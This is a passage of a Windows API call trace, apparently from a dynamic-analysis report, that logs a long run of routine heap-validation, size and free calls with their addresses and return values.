returned 0x47c0000 [0178.127] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c69d0) returned 0xa0 [0178.127] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c69d0) returned 1 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] GetProcessHeap () returned 0x47c0000 [0178.127] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7718) returned 1 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7718) returned 0x10 [0178.128] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7718) returned 1 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c95f8) returned 1 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c95f8) returned 0x14 [0178.128] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c95f8) returned 1 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cadd0) returned 1 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cadd0) returned 0x60 [0178.128] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cadd0) returned 1 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.128] GetProcessHeap () returned 0x47c0000 [0178.129] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cac48) returned 1 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.129] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cac48) returned 0x10 [0178.129] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cac48) returned 1 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.129] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9658) returned 1 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.129] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9658) returned 0x14 [0178.129] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9658) returned 1 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.129] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c70c0) returned 1 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.129] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c70c0) returned 0x64 [0178.129] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c70c0) returned 1 [0178.129] GetProcessHeap () returned 0x47c0000 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cabb8) returned 1 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cabb8) returned 0x10 [0178.130] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cabb8) returned 1 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9518) returned 1 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9518) returned 0x14 [0178.130] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9518) returned 1 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7688) returned 1 [0178.130] GetProcessHeap () returned 0x47c0000 [0178.130] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7688) returned 0xc [0178.131] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7688) returned 1 [0178.131] GetProcessHeap () returned 0x47c0000 [0178.131] GetProcessHeap () returned 0x47c0000 [0178.131] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7670) returned 1 [0178.131] GetProcessHeap () returned 0x47c0000 [0178.131] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7670) returned 0x10 [0178.131] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7670) returned 1 [0178.131] GetProcessHeap () returned 0x47c0000 [0178.131] GetProcessHeap () returned 0x47c0000 [0178.131] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c93f8) returned 1 [0178.131] GetProcessHeap () returned 0x47c0000 [0178.131] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c93f8) returned 0x14 [0178.131] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c93f8) returned 1 [0178.131] GetProcessHeap () returned 0x47c0000 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c8cd0) returned 1 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c8cd0) returned 0x208 [0178.132] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c8cd0) returned 1 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7568) returned 1 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c7568) returned 0x10 [0178.132] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c7568) returned 1 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9638) returned 1 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9638) returned 0x14 [0178.132] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9638) returned 1 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] GetProcessHeap () returned 0x47c0000 [0178.132] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47ca788) returned 1 [0178.133] GetProcessHeap () returned 0x47c0000 [0178.133] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47ca788) returned 0x200 [0178.133] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47ca788) returned 1 [0178.133] GetProcessHeap () returned 0x47c0000 [0178.133] GetProcessHeap () returned 0x47c0000 [0178.133] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c75b0) returned 1 [0178.133] GetProcessHeap () returned 0x47c0000 [0178.133] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c75b0) returned 0x10 [0178.133] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c75b0) returned 1 [0178.133] GetProcessHeap () returned 0x47c0000 [0178.133] GetProcessHeap () returned 0x47c0000 [0178.133] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c95d8) returned 1 [0178.133] GetProcessHeap () returned 0x47c0000 [0178.133] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c95d8) returned 0x14 [0178.133] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c95d8) returned 1 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9438) returned 1 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9438) returned 0x14 [0178.134] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9438) returned 1 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c75f8) returned 1 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c75f8) returned 0x10 [0178.134] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c75f8) returned 1 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c2778) returned 1 [0178.134] GetProcessHeap () returned 0x47c0000 [0178.134] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c2778) returned 0x14 [0178.135] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c2778) returned 1 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9478) returned 1 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9478) returned 0x16 [0178.135] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9478) returned 1 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c75c8) returned 1 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c75c8) returned 0x10 [0178.135] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c75c8) returned 1 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.135] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6608) returned 1 [0178.135] GetProcessHeap () returned 0x47c0000 [0178.136] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6608) returned 0x14 [0178.136] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6608) returned 1 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c0598) returned 1 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c0598) returned 0x2 [0178.136] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c0598) returned 1 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6e38) returned 1 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6e38) returned 0x14 [0178.136] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6e38) returned 1 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6c00) returned 1 [0178.136] GetProcessHeap () returned 0x47c0000 [0178.136] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6c00) returned 0x14 [0178.136] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6c00) returned 1 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6c20) returned 1 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6c20) returned 0x14 [0178.137] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6c20) returned 1 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6c40) returned 1 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6c40) returned 0x14 [0178.137] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6c40) returned 1 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9418) returned 1 [0178.137] GetProcessHeap () returned 0x47c0000 [0178.137] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9418) returned 0x14 [0178.137] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9418) returned 1 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47ca9d8) returned 1 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47ca9d8) returned 0xc [0178.138] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47ca9d8) returned 1 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9678) returned 1 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9678) returned 0x14 [0178.138] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9678) returned 1 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6a78) returned 1 [0178.138] GetProcessHeap () returned 0x47c0000 [0178.138] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6a78) returned 0x30 [0178.138] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6a78) returned 1 [0178.139] GetProcessHeap () returned 0x47c0000 [0178.139] GetProcessHeap () returned 0x47c0000 [0178.139] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9458) returned 1 [0178.139] GetProcessHeap () returned 0x47c0000 [0178.139] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9458) returned 0x14 [0178.139] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9458) returned 1 [0178.139] GetProcessHeap () returned 0x47c0000 [0178.139] GetProcessHeap () returned 0x47c0000 [0178.139] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cad98) returned 1 [0178.139] GetProcessHeap () returned 0x47c0000 [0178.139] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cad98) returned 0x30 [0178.139] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cad98) returned 1 [0178.139] GetProcessHeap () returned 0x47c0000 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.140] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9338) returned 1 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.140] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9338) returned 0x14 [0178.140] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9338) returned 1 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.140] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9378) returned 1 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.140] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9378) returned 0x16 [0178.140] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9378) returned 1 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.140] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c94d8) returned 1 [0178.140] GetProcessHeap () returned 0x47c0000 [0178.141] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94d8) returned 0x14 [0178.141] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c94d8) returned 1 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9398) returned 1 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9398) returned 0x16 [0178.141] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9398) returned 1 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9558) returned 1 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9558) returned 0x14 [0178.141] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9558) returned 1 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47d9dd8) returned 1 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47d9dd8) returned 0x82 [0178.141] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47d9dd8) returned 1 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.141] GetProcessHeap () returned 0x47c0000 [0178.142] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9598) returned 1 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9598) returned 0x14 [0178.142] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9598) returned 1 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47caba0) returned 1 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47caba0) returned 0xe [0178.142] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47caba0) returned 1 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9698) returned 1 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9698) returned 0x14 [0178.142] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9698) returned 1 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47caac8) returned 1 [0178.142] GetProcessHeap () returned 0x47c0000 [0178.142] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47caac8) returned 0xc [0178.143] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47caac8) returned 1 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9618) returned 1 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9618) returned 0x14 [0178.143] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9618) returned 1 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47ca9c0) returned 1 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47ca9c0) returned 0xe [0178.143] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47ca9c0) returned 1 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9318) returned 1 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.143] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9318) returned 0x14 [0178.143] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9318) returned 1 [0178.143] GetProcessHeap () returned 0x47c0000 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47cabd0) returned 1 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47cabd0) returned 0x10 [0178.144] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47cabd0) returned 1 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c96d8) returned 1 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c96d8) returned 0x14 [0178.144] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c96d8) returned 1 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c76b8) returned 1 [0178.144] GetProcessHeap () returned 0x47c0000 [0178.144] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c76b8) returned 0x10 [0178.145] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c76b8) returned 1 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.145] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6830) returned 1 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.145] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6830) returned 0x14 [0178.145] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6830) returned 1 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.145] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6850) returned 1 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.145] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6850) returned 0x14 [0178.145] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6850) returned 1 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.145] GetProcessHeap () returned 0x47c0000 [0178.146] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c6870) returned 1 [0178.146] GetProcessHeap () returned 0x47c0000 [0178.146] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c6870) returned 0x14 [0178.146] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c6870) returned 1 [0178.146] GetProcessHeap () returned 0x47c0000 [0178.146] GetProcessHeap () returned 0x47c0000 [0178.146] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c65c8) returned 1 [0178.146] GetProcessHeap () returned 0x47c0000 [0178.146] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c65c8) returned 0x14 [0178.146] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c65c8) returned 1 [0178.146] GetProcessHeap () returned 0x47c0000 [0178.146] GetProcessHeap () returned 0x47c0000 [0178.146] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c76d0) returned 1 [0178.146] GetProcessHeap () returned 0x47c0000 [0178.146] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c76d0) returned 0x10 [0178.147] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c76d0) returned 1 [0178.147] GetProcessHeap () returned 0x47c0000 [0178.147] GetProcessHeap () returned 0x47c0000 [0178.147] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c65e8) returned 1 [0178.147] GetProcessHeap () returned 0x47c0000 [0178.147] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c65e8) returned 0x14 [0178.147] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c65e8) returned 1 [0178.147] GetProcessHeap () returned 0x47c0000 [0178.147] GetProcessHeap () returned 0x47c0000 [0178.147] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c2798) returned 1 [0178.147] GetProcessHeap () returned 0x47c0000 [0178.147] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c2798) returned 0x14 [0178.147] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c2798) returned 1 [0178.148] GetProcessHeap () returned 0x47c0000 [0178.148] GetProcessHeap () returned 0x47c0000 [0178.148] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c9578) returned 1 [0178.148] GetProcessHeap () returned 0x47c0000 [0178.148] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c9578) returned 0x14 [0178.148] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c9578) returned 1 [0178.148] GetProcessHeap () returned 0x47c0000 [0178.148] GetProcessHeap () returned 0x47c0000 [0178.148] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c94f8) returned 1 [0178.148] GetProcessHeap () returned 0x47c0000 [0178.148] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c94f8) returned 0x14 [0178.148] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c94f8) returned 1 [0178.149] GetProcessHeap () returned 0x47c0000 [0178.149] GetProcessHeap () returned 0x47c0000 [0178.149] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c93d8) returned 1 [0178.149] GetProcessHeap () returned 0x47c0000 [0178.149] RtlSizeHeap (HeapHandle=0x47c0000, Flags=0x0, MemoryPointer=0x47c93d8) returned 0x14 [0178.149] RtlFreeHeap (HeapHandle=0x47c0000, Flags=0x0, BaseAddress=0x47c93d8) returned 1 [0178.149] GetProcessHeap () returned 0x47c0000 [0178.149] GetProcessHeap () returned 0x47c0000 [0178.149] HeapValidate (hHeap=0x47c0000, dwFlags=0x0, lpMem=0x47c7610) returned 1 [0178.149] GetProcessHeap () returned 0x47c0000 [0178.149] 